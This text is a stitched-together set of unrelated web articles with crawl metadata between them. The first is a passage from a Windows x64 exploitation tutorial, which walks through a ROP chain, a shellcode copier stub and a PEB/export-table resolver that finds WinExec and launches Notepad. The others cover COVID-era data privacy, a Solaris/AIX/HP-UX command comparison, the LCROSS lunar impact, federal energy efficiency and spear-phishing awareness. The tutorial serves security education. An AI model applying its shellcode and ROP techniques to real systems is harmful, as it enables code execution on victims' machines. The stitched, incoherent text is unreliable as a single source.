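For context, each `rop+=` line in the script appends one little-endian 64-bit value, so the whole chain is just packed addresses laid out in execution order. A stripped-down sketch of that packing (the second address is a placeholder, not a real gadget from this binary):

```python
import struct

def q(value):
    """Pack one 64-bit little-endian qword, as each rop += struct.pack("<Q", ...) line does."""
    return struct.pack("<Q", value)

ADD_RAX_20 = 0x1400060B7  # ADD RAX, 0x20 ; RET  (the gadget changed above)
FAKE_NEXT  = 0x140001234  # placeholder address for whatever gadget follows

rop = b""
rop += q(ADD_RAX_20)
rop += q(FAKE_NEXT)
```

When the chain runs, each 8-byte slot is popped into RIP in turn by the trailing RET of the previous gadget, which is why the order of the `q(...)` calls is the order of execution.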
Recall from previous parts of the series that the memcpy does not copy everything we send to the space which is reserved in the heap with VirtualAlloc.
Instead, it only allocates and copies 0x64 bytes, which avoids wasting space.
We see in this newly written code that the memmove is going to copy in the reserved area created in the heap. It is also the one that is going to prepare everything to implement the final shellcode. We’ll see all of this upon execution.
The shellcode sits in the stack below the ROP chain, without execute permission. Why not put the shellcode itself in the heap, instead of that copier code, and execute it there directly?
The answer is because it doesn't fit. We already saw that the space in the heap only reserves 0x64 bytes. We lose the first 0x20 when we jump, so we only have 0x44 bytes left.
Let's run it and then go into further explanation.
When we run the script, it stops at the breakpoints that were put in.
Then we’ll allocate the 0x64 bytes.
We can see that it actually allocates more than 0x64. Unfortunately, the problem is that it strictly copies only 0x64 bytes.
Let's not forget that the ROP clobbers some bytes at the beginning, and to jump we have to avoid them. The only thing that will work is the gadget that adds 0x20 to RAX. However, this leaves little space for the shellcode.
We’ll then trace the shellcode to VirtualAlloc.
We’ve arrived with the correct arguments so we can go to the RET, put the cursor there, and press F4. This ensures it will not trace as much.
This is the GADGET that adds 0x20 to RAX to jump to execute, avoiding the bytes that were broken at the beginning.
Next, we’ll jump to execute.
Now we can see the code made for this exercise. It looks for the shellcode in the stack and copies it below. The memmove did not copy it completely because of the 0x64-byte copy-size limit, but this code can copy it completely by hand.
RSI will have the source.
RDI will be the destination.
And RCX has the size to copy in dwords.
When we get to the REP MOVSD, we’ll copy the shellcode and do a PUSH RDI to save the address of the destination where we’ll copy, which is in RDI.
The above image shows where we can put the cursor. From there, we’ll press F4.
We see that it will call WinExec with the string NOTEPAD as an argument, which will execute the NOTEPAD.
Now the shellcode is about to execute, but we'll run through an explanation first. This is not easy to do in x64dbg, so we will run the script and attach with WinDbg so we can see the structures and symbols we need. However, before giving it a RUN, we'll first verify that it executes NOTEPAD.
We see that the NOTEPAD runs, then goes to ExitProcess and closes.
If we run it without debugging we see that it runs NOTEPAD and closes correctly.
We’ll next attach it with the Windbg to trace the RESOLVER.
After it stops, we’ll run the reload module to load the symbols:
It will then finish downloading all the symbols, which we can have listed out:
Now we have the symbols.
Next, we’ll place a breakpoint.
In order to trace to the shellcode, we can put a Breakpoint in VirtualAlloc.
We’ll RUN with G and accept the MessageBoxA. When VirtualAlloc is called by the program at startup, we continue with G.
We’ll stop again in VirtualAlloc, but first we must stop in the RET, which is the following stop, so we’ll go there first.
Now we’ve stopped at the RET.
We’ll press G again and now it stops in VirtualAlloc. SHIFT+F11 is STEP OUT, which exits the function just after the RET.
We’ll trace with F11.
Now we’ve arrived at the code written for this exercise.
We’ll keep tracing with F10 to pass the REP MOVS so that it doesn't repeat.
We can now move to the next section, which covers SHELLCODE RESOLVER.
Resolve 64 Bits and Finding the Kernel32 Image Base
We’ve arrived at CDQ, which sign-extends EAX into EDX. Since EAX here is non-negative (the sign flag is clear), EDX is set to zero, and writing EDX also clears the upper half of RDX; in effect it works like an XOR RDX, RDX.
It's zero, so it says RDX=0.
Remember that in 32 bits, the TEB or TIB was pointed to by FS.
In 64 bits, the GS register is used for the TEB.
In 32 bits we could use the command dg fs to see the value of FS.
However, it doesn't work with GS.
However, we have more tricks up our sleeve! We can try the !teb command.
Now we see the content of the TEB. In this instance, its base is 0x21f000 and the address of the PEB is 0x21e000.
If we trace the first instruction, we’ll see it is reading the PEB from the 0x60 field.
mov rax, qword ptr gs:[rdx+60h]
Since we know the address of the TEB—0x21f000—we can use the dt command and see it better.
dt nt!_TEB 0x21f000
We also have a link to show the PEB that will work.
The second instruction is:
We’ll need to read the field that is in the 0x18 offset of the PEB. There is a link we can click to see the list of the PEB.
It reads PEB->Ldr
According to Microsoft, Ldr is a pointer to PEB_LDR_DATA structure that contains information about the loaded modules for the process.
Let’s move on.
We can click on LDR or list _PEB_LDR_DATA.
We see that in the 0x20 offset it loads InMemoryOrderModuleList
According to Microsoft, InMemoryOrderModuleList, “The head of a doubly-linked list that contains the loaded modules for the process. Each item in the list is a pointer to an LDR_DATA_TABLE_ENTRY structure.”
In some web pages, and even when we did the 32-bit RESOLVER part,
LDR_DATA_TABLE_ENTRY is also called LDR_MODULE. These are both the same, only LDR_MODULE is shorter.
In this case, it is convenient to call it LDR_DATA_TABLE_ENTRY since that way it is listed in the Windbg.
We can see the first field is of _LIST_ENTRY type. As the documentation says, it has its FLINK that points to a similar structure that corresponds to the following module, as it is a linked list.
We see in the image that structures are connected between them, by means of the FLINK and BLINK. FLINK is a pointer to the following structure. Once we find the content of it, we will have the FLINK of the following structure.
mov rsi, [rax + 0x20]
This instruction has us load in RSI=InMemoryOrderModuleList which, as we saw before, is the beginning of the linked list and in turn belongs to the first module of the LDR_DATA_TABLE_ENTRY string.
Those who followed the tutorial of the 32 bits resolver will remember that InLoadOrderLinks was used in the first field. Both InMemoryOrderModuleList and InLoadOrderLinks are lists with the same information about the modules. However, the order in which they are located will change depending on which one you use. In this case we always have our FLINK in the offset 0x10, instead of being in the OFFSET 0x0 of the structure as it was InLoadOrderLinks.
RSI is in the 0x10 offset of the first LDR_DATA_TABLE_ENTRY. In this instance, it's 0x0462fa0.
We can list it in the Windbg.
We can see that we were at offset 0x10, so 0x10 had to be subtracted in order to list the structure.
dt LDR_DATA_TABLE_ENTRY (0x0462fa0 -0x10)
It corresponds to the executable module, which is always the first one in the chain. We see the ImageBase and its name, as well as the FLINK to the structure of the second module.
This is done programmatically by dereferencing RSI: the LODS instruction reads the qword at [RSI] into RAX.
lods qword ptr [rsi] ds:0x00462fa0=0x0462e10
RAX is again at offset 0x10 of the second structure. Let’s see which module it corresponds to.
We see that the second LDR_DATA_TABLE_ENTRY corresponds to ntdll.dll and that the third one, pointed by the FLINK, will be 0x463460.
Then RAX is moved into RSI using XCHG.
It then dereferences again using LODS. Naturally, the value matches and will be 0x463460.
It corresponds to kernel32.dll. Since RAX is positioned at offset 0x10, all that's needed to read the base of kernel32.dll is to add 0x20, which gets us to offset 0x30.
With this it already found the kernel32.dll base, which was the first target to look for.
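To make the offsets concrete, the whole walk can be modeled in Python with a fake qword-addressable memory. Every address below is invented; only the offsets mirror what the shellcode reads (Ldr at PEB+0x18, InMemoryOrderModuleList at Ldr+0x20, each FLINK at entry+0x10, and DllBase at entry+0x30, i.e. FLINK pointer + 0x20):

```python
# Fake memory: address -> qword stored there.  Every address here is invented.
mem = {}
PEB, LDR = 0x1000, 0x2000
EXE_ENTRY, NTDLL_ENTRY, K32_ENTRY = 0xA000, 0xB000, 0xC000
K32_BASE = 0x7FFE0000  # pretend kernel32.dll image base

mem[PEB + 0x18] = LDR                       # PEB->Ldr
mem[LDR + 0x20] = EXE_ENTRY + 0x10          # Ldr->InMemoryOrderModuleList (first FLINK)
mem[EXE_ENTRY + 0x10] = NTDLL_ENTRY + 0x10  # exe entry FLINK -> ntdll entry
mem[NTDLL_ENTRY + 0x10] = K32_ENTRY + 0x10  # ntdll entry FLINK -> kernel32 entry
mem[K32_ENTRY + 0x30] = K32_BASE            # LDR_DATA_TABLE_ENTRY.DllBase

def find_kernel32_base(peb):
    ldr = mem[peb + 0x18]   # mov rax, [rax+0x18]   (after reading gs:[rdx+0x60])
    rsi = mem[ldr + 0x20]   # mov rsi, [rax+0x20]
    rax = mem[rsi]          # lods: first FLINK -> ntdll entry + 0x10
    rax = mem[rax]          # xchg + lods: -> kernel32 entry + 0x10
    return mem[rax + 0x20]  # +0x20 from the FLINK = +0x30 in the structure: DllBase
```

The model makes it clear why the shellcode takes exactly two LODS hops: the module order in InMemoryOrderModuleList is executable, then ntdll.dll, then kernel32.dll.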
Finding WINEXEC'S Address
Once the base of Kernel32.dll is found, the steps to find WinExec or the function we want inside kernel32 are as follows:
We will trace part of the code to check that everything corresponds.
The structure where the header starts is called _IMAGE_DOS_HEADER and is in the address of the kernel32.dll image we found. We can see the characteristic MZ the two bytes that are at the beginning in the DOS executables.
We see that the shellcode reads the offset field 0x3c.
Its value is 232 decimal, so 0xe8 in hexadecimal is the offset of _IMAGE_NT_HEADERS64.
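This 0x3c read is the classic e_lfanew lookup from _IMAGE_DOS_HEADER. A toy version of it, over a fabricated DOS header in which only the "MZ" magic and the e_lfanew field at 0x3c are filled in:

```python
import struct

# Build a fake 0x40-byte _IMAGE_DOS_HEADER: "MZ" magic, e_lfanew = 0xE8 at offset 0x3c.
dos_header = bytearray(0x40)
dos_header[0:2] = b"MZ"
struct.pack_into("<I", dos_header, 0x3C, 0xE8)

def e_lfanew(image):
    """Read the offset of _IMAGE_NT_HEADERS64 from DOS header field 0x3c."""
    assert bytes(image[:2]) == b"MZ", "not a DOS/PE image"
    return struct.unpack_from("<I", image, 0x3C)[0]
```

Adding this value to the image base, exactly as the shellcode does, lands on the NT headers.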
It then adds the image base to get the address.
In RDX, we’ll find that the address is _IMAGE_NT_HEADERS64.
We’ll then look for the field 0x88. We’ll find it inside OptionalHeader, which is at 0x18.
We can see that offset 0x70 of _IMAGE_OPTIONAL_HEADER64 holds the _IMAGE_DATA_DIRECTORY array. Adding the 0x18 at which the OptionalHeader sits inside _IMAGE_NT_HEADERS64 brings us to 0x88, as the shellcode reads.
The following image shows an ARRAY of _IMAGE_DATA_DIRECTORY:
The first entry is the one for the EXPORT TABLE, and its first field holds the offset (RVA) of the table.
It then adds the base to obtain the address of the EXPORT TABLE.
It reads AddressOfNames from offset 0x20.
AddressOfFunctions is an RVA that points to an array of function addresses, which, oddly enough, are also RVAs.
AddressOfNames points to a list of function names. Since these addresses are RVAs, they must be added to the image base to get the function name and address.
AddressOfNameOrdinals is an RVA to a list of ordinals. The ordinals are not RVAs, but are just numbers that represent exported functions.
So, there are three arrays: AddressOfFunctions at 0x1c, AddressOfNames at 0x20, and AddressOfNameOrdinals at 0x24.
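With the three parallel arrays extracted, the resolver's loop reduces to a few lines of Python. The names and RVAs below are fabricated, not real kernel32 values; only the indexing pattern (name index into the ordinal table, ordinal into the function table, then add the base) matches what the shellcode does:

```python
def resolve_export(base, names, ordinals, functions, wanted):
    """Mirror the shellcode loop: walk AddressOfNames with index rcx,
    use the same index into AddressOfNameOrdinals, use that ordinal
    into AddressOfFunctions, and add the image base to the RVA."""
    for rcx, name in enumerate(names):       # loop over the name table
        if name == wanted:                   # string compare (e.g. "WinExec")
            ordinal = ordinals[rcx]          # AddressOfNameOrdinals[rcx]
            rva = functions[ordinal]         # AddressOfFunctions[ordinal]
            return base + rva                # RVA + base = virtual address
    return None

# Fabricated example data, not real kernel32 exports.
base      = 0x7FFE0000
names     = ["CreateFileA", "ExitProcess", "WinExec"]
ordinals  = [4, 1, 7]
functions = [0, 0x11000, 0, 0, 0x12000, 0, 0, 0x62F00]
```

Swapping the `wanted` string is all it takes to resolve a different export, which is exactly why the shellcode only needs the function name changed to target another API.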
We can see that RSI has the table or array of names.
In order to find the name string for each table entry, we have to add the base. The code loops over the table, reading each offset, adding the base, and comparing the resulting string with "WinExec". As a note, if we wanted another function, we would simply swap in the name of the one we want to find.
Let's see what the little table points to first.
Each of these offsets plus the base points to the name of an exported function. It makes a loop through the table, comparing each string with WinExec.
We can put a BREAKPOINT after JNE and press RUN to stop when it finds the name.
Here’s what we see when it stops.
It increases RCX, which is the table index. That means the position in the table for WinExec is RCX=0x60e.
Remember that we add 0x20 to r8 and then the base to find the name table. If we add 0x24 and then the base we’ll find the ordinal table.
Indexing the ordinal table with the value in RCX (the position found in the name table), we obtain the function's ordinal number.
The number we find is also 0x60e, and it is used as the index into the last table to find the offset of the WinExec function.
So, RSI + RCX*4 gives us the offset of WinExec.
We’ll add this to the base and this will give us the virtual address of WinExec.
And that's it! We’ll simply arrange a NOTEPAD string to pass and jump to run WinExec with the "NOTEPAD" argument.
Then, if we step over the call with F10 and continue, it calls ExitProcess to close the process.
We can see that the NOTEPAD is running!
This concludes the 64-bit RESOLVER. In part 14, we'll discuss how to analyze the difficulty of creating a ROP chain depending on the scenario.
Explore the Rest of the Reversing & Exploiting Series
Head to the main series page so you can check out past and future installments of the Reversing & Exploiting Using Free Tools. | <urn:uuid:dae3b93f-bbc8-4eaf-851c-fd34bb754404> | CC-MAIN-2022-40 | https://www.coresecurity.com/core-labs/articles/reversing-and-exploiting-free-tools-part-13 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00154.warc.gz | en | 0.910443 | 3,391 | 2.546875 | 3 |
While almost every country in the world is struggling to keep up with the consequences of the deadly spread of COVID-19, efforts continue to find a cure or a vaccine or, at the least, methods that can limit the uncontrolled multiplication of the virus. The dilemma that many countries face today is twofold: explore every possible solution to contain the COVID-19 spread, and still not cross the fine line drawn in the protection of data privacy.
A recent study at Oxford University is an addition to the groups of experts advocating the method of ‘contact tracing’ to nip the infectious disease at its bud. In this approach, the location of the infected person is tracked, and anyone who has come in contact with the patient is informed and warned for isolation.
Europe and the US, in collaboration with giants like Facebook and Google, are now looking at similar ways to track down infected people. Few might opine that this is an invasion of privacy.
Several countries in Asia, like China and South Korea, have reportedly relied on surveillance of mobile phones to track the infected individual’s activities and reportedly shared their information with others. Some countries are also building apps that can help patients to enter their test results and make them available to the health officials for tracking them down.
Singapore has taken measures with the aid of the TraceTogether app, which uses Bluetooth technology to tether with other Bluetooth-enabled devices that have the app installed. The app maintains a log of people who have been within Bluetooth radius for at least half an hour.
In countries with stringent privacy laws, the data collected through telecom operators is anonymized and aggregated, and the trends of where infections congregate and the map of the disease spread are tracked.
Although dire times due to COVID-19 call for extreme measures by authorities, the fundamental issue of data privacy is raked up yet again. Although a global pandemic can be a reason enough to use the collected private data for the greater good, the expectations about privacy protections cannot be ignored.
Rights and obligations of the employers pertaining to COVID-19
With the COVID-19 outbreak impacting businesses worldwide, many privacy advocates are warning enterprises against demanding excess information from employees and urging them to adhere to the privacy laws of their respective countries. Many enterprises have sought travel bans and ordered health tests for their employees as a crucial step to stop the spread of the pandemic. However, these enterprises are walking a narrow bridge, as employees may not be comfortable sharing their personal information. For instance, in Europe, under the General Data Protection Regulation (GDPR), the rules are clear that employee data can only be collected for a specific reason, and only with consent.
For the past few weeks, many countries like the Netherlands, France, Italy, Denmark, and a few more have issued statements forbidding enterprises from collecting excessive employee data.
Although the pandemic is dangerous, “it does not give a free reason to gather private data”, argue the privacy advocates.
Apart from maintaining employee private information (and sharing it with government agencies when necessary), enterprises are also tasked with the challenges of employees working remotely, which presents the danger of exposing organizational data, opening a Pandora's box of data security concerns.
Within an enterprise network, there are adequate security protocols in place. Working remotely adds local and public networks, exposing the organization's IT infrastructure to unprecedented risks. In such situations, taking necessary security-enhancing steps, such as working over Virtual Private Networks (VPNs), avoiding the usage of USB sticks, and using secure cloud services, will come in handy.
Another challenge for enterprises is to maintain the data from the DSAR (Data Subject Access Request) forms submitted by consumers while ensuring consumers their right of access to information. While collecting data amidst this chaos can be useful, the additional costs of maintaining the data and ensuring easy access for consumers can potentially add billions of dollars of overhead to organizations.
Keeping all these potential problems in view, just taking some necessary steps in ensuring data security will not be sufficient. Having a robust data privacy framework is the way ahead to deal efficiently with significant data privacy concerns during these testing times.
What does the law say?
As more and more nations struggle to keep up with the fight against the COVID-19, many of them are moving towards tracking mobile phone information of consumers, raising widespread privacy alarms across the world. In such situations, the data privacy laws of countries can be a guiding light to businesses, government agencies, and consumers who know their rights and will stand against any breach of privacy.
For instance, in Europe, the General Data Protection Regulation (GDPR) has been in place for a couple of years now. This regulation is directly applicable to all member states in the interest of consumer data protection. However, many member states have asked for room to adapt their own privacy regulations as well.
Similarly, in the United States, the California Consumer Privacy Act (CCPA) has imposed strict data privacy regulations that allow enterprises to collect and use consumer data only upon consent, and it places restrictions on when and how the information can be shared with third parties. Following California, many other states like New York are also in the process of passing stringent data privacy regulations.
Developing countries like Brazil also have their version of GDPR called the Lei Geral de Proteção de Dados Pessoais or LGPD. This was passed in 2018 and presents a series of regulations to organizations to comply thereby ensuring the protection of private individual information.
In India, the Personal Data Protection Bill was passed in 2019; this bill specifically prohibits the collection or processing of sensitive personal data of people without any specific, explicit, and lawful purpose. The bill stresses important aspects like consent, protection of data, and restricts sharing information among third parties without consent.
With more and more countries around the world moving towards their own privacy regulation bills, it seems that the importance of ensuring privacy through efficient systems and software in place should be considered more than ever by small and big enterprises around the globe.
The COVID-19 crisis has raised an alarm about many global activities and has significantly changed the approach and working style of many businesses. While tracking patients and isolating them can be an effective way to reduce the spread of the virus, the question remains how ethical it is, given that one shouldn't cross the fine line between protection and privacy breach. Should there be relaxations or changes in privacy regulations like the CCPA or GDPR to fuel up the already slow and hard-hit businesses across the globe?
Enterprises have many challenges ahead of them. Not only do they have to deal with the visible recession, but they will also have to handle the overhead costs of ensuring robust security and privacy systems that provide safe remote-working conditions. The recently enforced CCPA timeline puts more pressure on enterprises to respond to consumers and regulatory authorities on the following issues:
- What data is being collected
- How enterprises will store this data
- With whom the data is shared
- Where the data processing will take place.
Being prepared with solutions to this complex challenge will help enterprises build transparency and trust.
What price do enterprises have to pay in this global crisis for further strengthening their IT infrastructure? With the amount of data, in terms of health information, travel history, and other personal employee information, reaching humongous proportions, what measures should enterprises undertake to handle the massive influx of data?
Although there are many apprehensions in the current scenario, one thing is quite clear: having a secure data privacy framework in place can greatly reduce the burden that ensuring data privacy places on the internal infrastructure of enterprises around the world.
In a previous article, I compiled a list of the top 50 Unix commands. Each of the commands I discussed are available on the top three Unix variants: Solaris, AIX and HP-UX. In this article, I'll walk you through the illustrious history of these Unix flavors, discuss some their fundamental differences and close with a command table comparison of important tasks.
Solaris, Sun's Unix version, was actually the successor of SunOS, going back to 1992. SunOS was originally based on the BSD flavor of Unix, while SunOS versions 5.0 and later are based on Unix System V Release 4 (rebranded as Solaris).
How did this happen? Let's go further back in time. SunOS version 1.0 was introduced in 1983 with support for Sun-1 and Sun-2 systems. Version 2.0 was introduced in 1985 -- its claim to fame was virtual file system (VFS) and NFS. In 1987, AT&T and Sun announced that they would work together on a project to merge System V and BSD into one release, based on SVR4. Solaris 2.4 was Sun's first Sparc/x86 release. The last release of SunOS was version 4.1.4 in November 1994. Solaris 7 was its first 64-bit Ultra Sparc release and added native support for file system metadata logging. Solaris 9, introduced in 2002, added support for Solaris Volume Manager and Linux capabilities. Solaris 10 was first introduced in 2005, which has a number of innovations, including support for its new ZFS file system, Solaris Containers and Logical Domains.
Solaris is presently up to version 10; the latest update was released in October 2008. Among its innovations is support for paravirtualisation, where Solaris 10 is used as a guest in Xen-based environments.
Fundamental differences and unique characteristics. Solaris is free and open source, distributed through the OpenSolaris operating system. Solaris is a more command-line-based Unix operating system than HP-UX or AIX; as a practical matter, it does not have anything comparable to the System Administration Manager (SAM) on HP-UX or the System Management Interface Tool (SMIT) on AIX. Solaris runs on Sparc and x86 environments. It also has the newest file system around, ZFS, which has made great strides in recent years, including the ability to be used as the root file system. ZFS has the potential to be the best all-around Unix file system. Solaris has many ways to implement virtualisation, including Containers/zones, xVM Server, Logical Domains and hardware partitioning.
HP-UX, Hewlett-Packard's Unix, was originally based on System V Release 3. It initially ran exclusively on the PA-RISC HP 9000 platform. Version 1 of HP-UX was released in 1984. Version 9 introduced its character-based graphical user interface (GUI), SAM, from which one administers the system. Version 10, introduced in 1995, brought changes in the layout of the system file and directory structure, making it similar to AT&T SVR4. Version 11 was introduced in 1997 and was HP's first release to support 64-bit addressing. In 2000, it was rebranded to 11i, when HP introduced operating environments: bundled groups of layered applications for specific IT purposes. In 2001, version 11.20 introduced support for Itanium systems. HP-UX was the first Unix to use Access Control Lists (ACLs) for file permissions and was also one of the first to introduce built-in support for Logical Volume Manager. Today, HP-UX uses Veritas as its primary file system due to the close partnership between Veritas and HP. HP-UX is currently up to release 11i v3, update 4.
Fundamental differences and unique characteristics. HP-UX is the first of the Unix systems to allow its customers to purchase specific operating environments. For example, if you are looking for its high availability (HA) product Serviceguard, you would purchase the specific environment that bundles in HA. HP-UX is the only version that uses a third-party file system, Veritas (Sun used to offer this many years ago). HP has many forms of virtualisation, including nPartitions, vPars, Integrity Virtual Machines (IVMs) and resource partitions; this does have a tendency to confuse some folks because there are so many choices. HP-UX runs on both HP 9000 and Integrity Itanium systems. HP-UX 11i v3 can support up to 128 processor cores. HP-UX provides a very strong command line in addition to its menu-based system, SAM. Performance tuning using kctune is in many ways simpler than what AIX and Solaris offer.
AIX was introduced by IBM in 1986. While it is based on Unix System V, it also has BSD roots and, more than any other flavor, is a hybrid of both. AIX was the first OS to introduce a journaled file system (JFS). It was also the first to have an integrated Logical Volume Manager (LVM). IBM first ported AIX to its RS/6000 platform in 1989. Version 5L was a breakthrough release introduced in 2001 that provided for Linux affinity and logical partitioning with the Power4 servers. In 2004, AIX introduced virtualisation in AIX 5.3: Advanced Power Virtualisation (APV) offered micro-partitioning, shared processor pools and symmetric multi-threading. In 2007, IBM enhanced its virtualisation product, coinciding with the release of AIX 6.1 and the Power6 architecture, and rebranded APV to PowerVM. The AIX enhancements included a form of workload partitioning called WPARs, which are similar to Solaris zones/Containers but with better functionality. The latest release is AIX 6.1.
Fundamental differences and unique characteristics. IBM is widely recognized as having the best virtualisation product on the midrange, PowerVM. Some recent innovations include live application mobility (allowing one to fail over working partitions without taking downtime), Active Memory Sharing and multiple shared processor pools. No other flavor of Unix can boast these virtualisation characteristics, nor can they match IBM's 40-year history of virtualisation -- PowerVM has evolved from mainframe/System z virtualisation.
AIX runs only on IBM Power Systems -- easily the most powerful of midrange Unix servers. IBM sells the fact that AIX runs exclusively on Power as a plus because the OS is fully optimized for this architecture and has a clear road map to which the company adheres religiously. It should also be noted that one can run both Linux and AIX partitions on this platform. Its Lx86 virtualisation add-on allows one to run x86 Linux applications that have not been ported to the Power architecture. AIX has always had an integrated logical volume manager, unlike other flavors that require add-on products. AIX is the only Unix that has continued to grow market share in recent years, partly because of the capabilities of its Power hardware, which continues to lead the field in reliability, availability and scalability.
Command reference comparison
| What are you trying to do? | Solaris | AIX | HP-UX |
| --- | --- | --- | --- |
| Specify order of name server resolution | /etc/nsswitch.conf | /etc/netsvc.conf | /etc/nsswitch.conf |
| Configure networking | /etc/nodename, /etc/netmasks, /etc/defaultrouter, ifconfig | recommendation is to use SMIT, because ifconfig does not save changes; lsattr | set_parms initial, netconf file, ioscan |
| Understand available file systems | ufs, zfs | jfs, jfs2 | hfs, VxFS |
| Add space to file systems | growfs | chfs | extendfs |
| Look at character-based admin GUI | None. Admintool was retired years ago; SMC (similar to AIX's WebSM) is the GUI | SMIT, smitty, WebSM | SAM |
| Examine hardware changes | prtconf | lscfg, lsattr, prtconf | ioscan, dmesg |
| View swap space | swap | lsps | swapinfo |
| Examine file system info | /etc/vfstab | /etc/filesystems | /etc/fstab |
| Check software and/or filesets | pkginfo, pkgchk | lslpp, lssrc | swlist |
| Install software | pkgadd | smit install | swinstall |
| Check error logs | prtdiag | errpt | dmesg |
| Tune the kernel | prctl and /etc/system | vmo, ioo, no, schedo, nfso, chdev | kctune |
| Start/stop services | svcadm, svcs | lssrc, stopsrc, startsrc | usually initiated by scripts from init.d, e.g. for network: /etc/init.d/net start |
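For scripts that must run on more than one of these flavors, a row of the table can be turned into a small dispatch helper. A minimal sketch, covering only the swap-space row; the same pattern extends to any of the rows above:

```python
import platform

# Dispatch table for one row of the comparison above: the command used
# to view swap space on each flavor (Solaris kernels identify as "SunOS").
SWAP_COMMANDS = {
    "SunOS": "swap",
    "AIX": "lsps",
    "HP-UX": "swapinfo",
}

def swap_command(os_name=None):
    """Return the swap-inspection command for the given (or current) OS."""
    name = os_name or platform.system()
    return SWAP_COMMANDS.get(name, "unknown OS: " + name)

print(swap_command("AIX"))  # lsps
```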
Early this morning, the astronomy and space world watched as the Northrop Grumman-built Lunar CRater Observation and Sensing Satellite (LCROSS) successfully impacted the moon’s Cabeus crater, ending a 112-day mission to find water ice on the moon that could serve as a resource for future lunar outposts. According to NASA, the debris cloud created by LCROSS’ impact produced good telemetry and was recorded by space and ground-based observatories. NASA will gather and analyze impact data from professional and amateur astronomers worldwide over the next several months to determine if water ice is present.
LCROSS used a standardized structural element; commercial off-the-shelf hardware, sensors and components; flight-proven payload instruments; and sophisticated risk management. The spacecraft was ready for delivery in just 29 months, for a total mission cost of $79 million.
“The success of this mission is a tribute to the tremendous engineering skills and partnership between Northrop Grumman and NASA Ames Research Center,” said Steve Hixson, vice president of Advanced Concepts-Space and Directed Energy Systems for Northrop Grumman Aerospace Systems. “We believe LCROSS will open the doors to new research and exploration missions based on the LCROSS model.”
A combination of recent federal policies and emerging technologies have the potential to significantly curb agencies’ energy spending.
The federal government owns or operates some 500,000 buildings across the world, and it spends billions of dollars each year heating, cooling and pumping water to and from them.
The numbers are staggering. The Defense Department alone spends $20 billion annually on energy consumption, according to Sharon Burke, former assistant secretary of defense for operational energy.
Speaking Oct. 28 in Washington, D.C., Burke, who’s now a senior adviser at the New America Foundation, said about $4 billion of that total goes toward electricity, with the “lion’s share” spent on actual military operations.
Yet, a combination of recent federal policies – the administration’s Climate Action Plan, a 2009 executive order and other federal sustainability efforts – and emerging technologies have the potential to significantly curb energy spending for defense and civilian agencies without reducing functionality.
“There’s no pushing efficiency if it is at odds with the mission because it won’t survive,” said Burke, alluding to the notion that any green initiative will only succeed insofar as it improves, or at least preserves, mission performance.
“There are a lot of opportunities for improving without losing performance,” Burke added. “It’s key because the second you lose performance, you lose.”
Discovering New Technologies
One of the unique offshoots in the government’s green efforts is the Green Proving Ground, a department housed within the General Services Administration.
The Green Proving Ground leverages GSA’s vast real-estate portfolio to transparently evaluate emerging green technologies such as energy management, lighting and on-site energy generation.
The proving ground examines technologies in partnership with national laboratories and makes recommendations on whether to “broadly deploy, target deploy or not to deploy,” across government, according to GSA Chief Greening Officer Eleni Reed.
Thus far, assessed green technologies that have shown promise include advanced power strips, condensing boilers, magnetic levitation chillers and wireless network sensors; 26 technology evaluations are ongoing in federal buildings around the country.
Efforts at the Green Proving Ground could further GSA’s successes in energy efficiency.
Reed said GSA has reduced carbon emissions by 53 percent in its building operations, and the agency spearheaded successful sustainability outcomes through the American Recovery and Reinvestment Act. That includes a 19 percent energy consumption reduction and 120 million gallons of water saved annually across almost 500 federal buildings and renewable energy generation capabilities in 89 buildings.
Reed said big data and analytics are beginning to play a role in the government’s sustainability efforts, too.
GSA’s “Smart Metering” initiative, Reed said, highlights how analytics applied to large data sets, such as power-consumption records, can be used to improve efficiency.
Under the initiative, GSA was able to obtain consumption data every 15 minutes over a catalog of 400 federal buildings. The data is useful to property managers who can notice changes in consumption patterns in near real-time. It’s akin to a building telling its manager where and when it is using energy.
“Property managers can identify spikes and analyze trends, year after year, and take action to correct,” Reed said.
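The spike detection Reed describes can be sketched in a few lines. This is a toy example with made-up 15-minute readings, flagging any interval that sits well above the building's recent average; a production system would use a more robust baseline than a simple mean:

```python
from statistics import mean, stdev

def find_spikes(readings, threshold=2.0):
    """Return indices of readings more than `threshold` standard
    deviations above the mean of the series."""
    mu = mean(readings)
    sigma = stdev(readings)
    return [i for i, r in enumerate(readings)
            if sigma > 0 and r > mu + threshold * sigma]

# Hypothetical 15-minute kWh readings for one morning; index 5 is a spike.
readings = [12.1, 11.8, 12.3, 12.0, 11.9, 48.7, 12.2, 12.0]
print(find_spikes(readings))  # [5]
```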
What about Security?
Smart buildings that provide real-time analytics sound like a great concept, but there’s an underlying danger -- especially for those involved in military operations.
Energy consumption, just like any other data, could feasibly be vulnerable to cyber adversaries.
“There are security vulnerabilities in the era of big data with smart metering, because loads could signify activity,” said Jeffrey Johnson, regional command information officer for Naval District Washington.
Naval District Washington accounted for those vulnerabilities in its recent “Smart Shore” initiative, Johnson said.
The pilot project aimed to ultimately reduce the cost of utility delivery across facilities, but one of the keys to its success, Johnson said, was measuring demand on each system. Of course, that information in the wrong hands could be dangerous, so Johnson said Naval District Washington did not explicitly name the system each load came from.
Even with unauthorized access to metered data, an adversary wouldn’t have the ability to tie it to specific systems. Altogether, the pilot has created some major efficiency gains for Naval District Washington without compromising security or performance, Johnson said. | <urn:uuid:b2ee2949-6b1f-4c20-9df3-6257ef17d07f> | CC-MAIN-2022-40 | https://www.nextgov.com/emerging-tech/2014/10/governments-sustainability-efforts-present-big-data-opportunity/97844/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00154.warc.gz | en | 0.931368 | 932 | 2.59375 | 3 |
Last month, researchers at Fortinet observed a sophisticated phishing email sent to a Hungarian diplomat. In the email, cybercriminals disguised themselves by using the first and last name of an employee in the diplomat’s IT department. In this case, the diplomat believed that the email was suspicious and forwarded it to the actual employee in the IT department for investigation.
This case is a perfect example of a popular attack called spear phishing. Spear phishing attacks are targeted at a single person or department that has information that cybercriminals want. In these attacks, cybercriminals conduct research on the specific person or department and figure out who they talk to frequently. Then, the cybercriminals send a message to the person or department, pretending to be someone they know and trust. It’s important to watch out for these attacks because they can happen to anyone, not just diplomats or executives.
Follow these tips to stay safe from spear phishing attacks:
Stop, Look, and Think. Don’t be fooled.
